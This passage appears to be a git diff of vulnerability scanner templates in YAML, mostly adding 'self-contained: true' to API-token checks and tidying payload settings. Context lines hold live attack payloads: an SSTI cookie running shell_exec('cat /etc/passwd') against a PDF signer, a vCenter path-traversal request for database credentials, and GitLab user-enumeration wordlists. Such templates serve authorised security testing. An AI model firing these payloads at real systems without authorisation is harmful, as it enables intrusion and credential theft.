+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml
index 2ccc098209..01f1d80084 100644
--- a/token-spray/spotify.yaml
+++ b/token-spray/spotify.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,spotify
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/square.yaml b/token-spray/square.yaml
index 383e3ddc8a..7ccb835189 100644
--- a/token-spray/square.yaml
+++ b/token-spray/square.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,square
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml
index 16e358e75a..50e8979aa7 100644
--- a/token-spray/stripe.yaml
+++ b/token-spray/stripe.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,stripe
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml
index 922e62848b..357fb1bdbf 100644
--- a/token-spray/tinypng.yaml
+++ b/token-spray/tinypng.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,tinypng
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml
index 5212516fc1..3b43f9e529 100644
--- a/token-spray/travisci.yaml
+++ b/token-spray/travisci.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,travis
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml
index d648daa0d1..ec654b2782 100644
--- a/token-spray/twitter.yaml
+++ b/token-spray/twitter.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,twitter
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml
index a05d17e57a..e7c0a0a2f8 100644
--- a/token-spray/visualstudio.yaml
+++ b/token-spray/visualstudio.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,visualstudio,microsoft
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml
index b48ed5e79f..7237446fce 100644
--- a/token-spray/wakatime.yaml
+++ b/token-spray/wakatime.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,wakatime
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml
index 9c1a8e2874..37e6b647ef 100644
--- a/token-spray/weglot.yaml
+++ b/token-spray/weglot.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weglot
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml
index 3ab7726092..8c1384579b 100644
--- a/token-spray/youtube.yaml
+++ b/token-spray/youtube.yaml
@@ -7,17 +7,19 @@ info:
severity: info
tags: token-spray,youtube
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
- matchers-condition: or
+ matchers-condition: or
matchers:
- type: word
part: body
words:
- 'quotaExceeded'
+
- type: status
status:
- 200
diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
index 70867414e7..869b0ddd14 100644
--- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
@@ -16,10 +16,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
+ threads: 50
payloads:
user: helpers/wordlists/user-list.txt
- attack: sniper
- threads: 50
matchers-condition: and
matchers:
diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
index e6b7567303..8302f25e2a 100644
--- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
@@ -15,10 +15,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
+ threads: 50
payloads:
uid: helpers/wordlists/numbers.txt
- attack: sniper
- threads: 50
matchers-condition: and
matchers:
diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
index 889fd93cff..f1d82689fa 100644
--- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
+++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
@@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
+
+ skip-variables-check: true
matchers-condition: and
matchers:
- type: status
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index c08699eb6d..00bc474218 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -33,7 +33,7 @@ requests:
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
- test@{{randstr.tld}}
+ test@{{randstr}}.tld
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"
diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
index 2fc7c98a9e..9ee7ce40bb 100644
--- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
@@ -12,7 +12,7 @@ info:
requests:
- raw:
- |
- GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
+ GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}
payloads:
@@ -20,14 +20,13 @@ requests:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
- attack: sniper
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
- part: body
+
- type: status
status:
- 200